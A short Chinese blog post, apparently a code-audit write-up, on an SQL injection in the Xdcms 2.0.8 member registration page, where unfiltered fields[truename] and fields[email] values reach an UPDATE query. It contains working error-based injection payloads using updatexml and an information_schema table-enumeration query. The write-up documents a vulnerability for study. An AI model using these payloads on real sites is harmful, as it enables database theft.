Xdcms 2.0.8 SQL注入
2018-05-04 本文已影响48人
CSeroad
在网上下载好xdcms2.0.8版本,安装后进行代码审计测试
漏洞位置:D:\audit\xdcms\system\modules\member\index.php
在会员注册的位置出现了SQL注入
注册注册页面有5个参数,分别是
username,password,password2,fields[truename], fields[email]
抓包可获取到
看一下具体代码,
插入数据库Username,password变量以sql插入语句进入数据库,在之前进行了安全过滤。
安全过滤即使用safe_html函数进行过滤
但是fields[truename], fields[email]这两个参数以更新的方式进入数据库,且没有安全过滤
漏洞由此产生
看代码
传值$field_sql为
上面进行的注册我们对file[truename]这个参数进行利用,抓包进行修改参数
利用exp漏洞利用:使用的exp为
xxxx' orupdatexml(2,concat(0x7e,(database())),0) or '
爆出数据库注意:因为用户名不能重复,所以每次放包都要修改username
爆出当前用户 success使用报错语句可爆出更多内容
update c_member set `truename`='abZXc' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '',`email`='sadssds' where userid=1
使用phpmyadmin进行测试
当前数据库xdcms 使用limit分别遍历 获取数据更多注入语句,参考